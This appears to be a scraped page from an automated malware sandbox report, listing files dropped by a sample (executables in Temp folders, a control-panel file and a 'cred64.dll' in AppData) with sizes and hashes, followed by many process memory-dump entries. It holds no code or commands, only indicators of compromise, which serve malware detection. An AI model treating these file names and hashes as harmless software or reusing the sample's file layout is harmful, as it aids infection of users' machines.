Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
Filesize
332KB

MD5
31d0310cd3d6d5e2e7c51508c12b25dd

SHA1
c19664c55ede5d5411d348fae4832823b7085086

SHA256
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6

SHA512
2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
Filesize
332KB

MD5
31d0310cd3d6d5e2e7c51508c12b25dd

SHA1
c19664c55ede5d5411d348fae4832823b7085086

SHA256
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6

SHA512
2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
Filesize
332KB

MD5
31d0310cd3d6d5e2e7c51508c12b25dd

SHA1
c19664c55ede5d5411d348fae4832823b7085086

SHA256
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6

SHA512
2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe
Filesize
218KB

MD5
9512d156c84429d1854ac514ed428f22

SHA1
7b92f647f9606c3574b0ffb7d35a9a877ad1e18e

SHA256
5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4

SHA512
79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

Download Submit
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe
Filesize
218KB

MD5
9512d156c84429d1854ac514ed428f22

SHA1
7b92f647f9606c3574b0ffb7d35a9a877ad1e18e

SHA256
5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4

SHA512
79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

Download Submit
C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL
Filesize
2.8MB

MD5
9859329af700af2cca4623587c54118f

SHA1
db96dc960469d7af6b01e3369db73469fcfb543f

SHA256
576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce

SHA512
9472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\uQwk5O.cpl
Filesize
2.8MB

MD5
9859329af700af2cca4623587c54118f

SHA1
db96dc960469d7af6b01e3369db73469fcfb543f

SHA256
576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce

SHA512
9472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\uQwk5O.cpl
Filesize
2.8MB

MD5
9859329af700af2cca4623587c54118f

SHA1
db96dc960469d7af6b01e3369db73469fcfb543f

SHA256
576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce

SHA512
9472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\uQwk5O.cpl
Filesize
2.8MB

MD5
9859329af700af2cca4623587c54118f

SHA1
db96dc960469d7af6b01e3369db73469fcfb543f

SHA256
576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce

SHA512
9472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
Filesize
126KB

MD5
98cc0f811ad5ff43fedc262961002498

SHA1
37e48635fcef35c0b3db3c1f0c35833899eb53d8

SHA256
62d5b300b911a022c5c146ea010769cd0c2fdcc86aba7e5be25aff1f799220be

SHA512
d2ae90628acf92c6f7d176a4c866a0b6a6cfcfd722f0aec89cb48afead4318311c3ca95fe6865ac254b601b70ef5f289a35f4b26fba67a4c9b3cc5e68c7bf9c1

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
Filesize
126KB

MD5
98cc0f811ad5ff43fedc262961002498

SHA1
37e48635fcef35c0b3db3c1f0c35833899eb53d8

SHA256
62d5b300b911a022c5c146ea010769cd0c2fdcc86aba7e5be25aff1f799220be

SHA512
d2ae90628acf92c6f7d176a4c866a0b6a6cfcfd722f0aec89cb48afead4318311c3ca95fe6865ac254b601b70ef5f289a35f4b26fba67a4c9b3cc5e68c7bf9c1

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
Filesize
126KB

MD5
98cc0f811ad5ff43fedc262961002498

SHA1
37e48635fcef35c0b3db3c1f0c35833899eb53d8

SHA256
62d5b300b911a022c5c146ea010769cd0c2fdcc86aba7e5be25aff1f799220be

SHA512
d2ae90628acf92c6f7d176a4c866a0b6a6cfcfd722f0aec89cb48afead4318311c3ca95fe6865ac254b601b70ef5f289a35f4b26fba67a4c9b3cc5e68c7bf9c1

Download Submit
memory/228-145-0x00000000006EC000-0x000000000070B000-memory.dmp

Filesize
124KB

Download
memory/228-146-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/732-210-0x0000000000000000-mapping.dmp

Download
memory/732-214-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/732-213-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/752-193-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/752-192-0x00000000005DC000-0x00000000005FB000-memory.dmp

Filesize
124KB

Download
memory/792-206-0x0000000002DF0000-0x0000000002F04000-memory.dmp

Filesize
1.1MB

Download
memory/792-191-0x0000000002DF0000-0x0000000002F04000-memory.dmp

Filesize
1.1MB

Download
memory/792-199-0x0000000002F10000-0x0000000003001000-memory.dmp

Filesize
964KB

Download
memory/792-190-0x0000000002A50000-0x0000000002CC6000-memory.dmp

Filesize
2.5MB

Download
memory/792-189-0x0000000002400000-0x00000000026C8000-memory.dmp

Filesize
2.8MB

Download
memory/792-203-0x00000000008B0000-0x0000000000989000-memory.dmp

Filesize
868KB

Download
memory/792-186-0x0000000000000000-mapping.dmp

Download
memory/1220-136-0x0000000000000000-mapping.dmp

Download
memory/1220-139-0x00000000007F8000-0x0000000000817000-memory.dmp

Filesize
124KB

Download
memory/1220-140-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1244-156-0x0000000000000000-mapping.dmp

Download
memory/1244-195-0x00000000053E0000-0x0000000005446000-memory.dmp

Filesize
408KB

Download
memory/1244-166-0x0000000005590000-0x0000000005BA8000-memory.dmp

Filesize
6.1MB

Download
memory/1244-197-0x00000000065B0000-0x0000000006B54000-memory.dmp

Filesize
5.6MB

Download
memory/1244-196-0x0000000005F60000-0x0000000005FF2000-memory.dmp

Filesize
584KB

Download
memory/1244-225-0x0000000007090000-0x00000000075BC000-memory.dmp

Filesize
5.2MB

Download
memory/1244-165-0x0000000000680000-0x00000000006B2000-memory.dmp

Filesize
200KB

Download
memory/1244-223-0x0000000006340000-0x0000000006502000-memory.dmp

Filesize
1.8MB

Download
memory/1244-167-0x0000000005110000-0x000000000521A000-memory.dmp

Filesize
1.0MB

Download
memory/1244-172-0x00000000050A0000-0x00000000050DC000-memory.dmp

Filesize
240KB

Download
memory/1244-170-0x0000000005040000-0x0000000005052000-memory.dmp

Filesize
72KB

Download
memory/1268-220-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/1268-216-0x0000000000000000-mapping.dmp

Download
memory/1268-224-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/1272-173-0x0000000000000000-mapping.dmp

Download
memory/1508-181-0x0000000000000000-mapping.dmp

Download
memory/2032-215-0x0000000000000000-mapping.dmp

Download
memory/2044-226-0x0000000000000000-mapping.dmp

Download
memory/2192-221-0x0000000000000000-mapping.dmp

Download
memory/2600-227-0x0000000000000000-mapping.dmp

Download
memory/2616-143-0x0000000000000000-mapping.dmp

Download
memory/2908-169-0x0000000003650000-0x0000000003764000-memory.dmp

Filesize
1.1MB

Download
memory/2908-194-0x0000000003650000-0x0000000003764000-memory.dmp

Filesize
1.1MB

Download
memory/2908-182-0x0000000003890000-0x0000000003969000-memory.dmp

Filesize
868KB

Download
memory/2908-174-0x0000000003780000-0x0000000003871000-memory.dmp

Filesize
964KB

Download
memory/2908-161-0x0000000000000000-mapping.dmp

Download
memory/2908-168-0x00000000032B0000-0x0000000003526000-memory.dmp

Filesize
2.5MB

Download
memory/3368-171-0x0000000000000000-mapping.dmp

Download
memory/3680-147-0x0000000000000000-mapping.dmp

Download
memory/3684-159-0x0000000000000000-mapping.dmp

Download
memory/3700-155-0x0000000000000000-mapping.dmp

Download
memory/3724-154-0x0000000000A90000-0x0000000000AB4000-memory.dmp

Filesize
144KB

Download
memory/3724-150-0x0000000000000000-mapping.dmp

Download
memory/3816-230-0x0000000000000000-mapping.dmp

Download
memory/3852-207-0x0000000000000000-mapping.dmp

Download
memory/4200-198-0x0000000000000000-mapping.dmp

Download
memory/4356-201-0x00000176EB830000-0x00000176EB852000-memory.dmp

Filesize
136KB

Download
memory/4356-208-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/4356-200-0x0000000000000000-mapping.dmp

Download
memory/4356-202-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp

Filesize
10.8MB

Download
memory/4388-180-0x0000000000000000-mapping.dmp

Download
memory/4548-176-0x0000000000000000-mapping.dmp

Download
memory/4576-175-0x0000000000000000-mapping.dmp

Download
memory/4808-135-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4808-142-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/4808-141-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/4808-134-0x00000000021B0000-0x00000000021EE000-memory.dmp

Filesize
248KB

Download
memory/4808-133-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/5040-209-0x0000000000000000-mapping.dmp

Download
memory/5048-185-0x0000000000000000-mapping.dmp

Download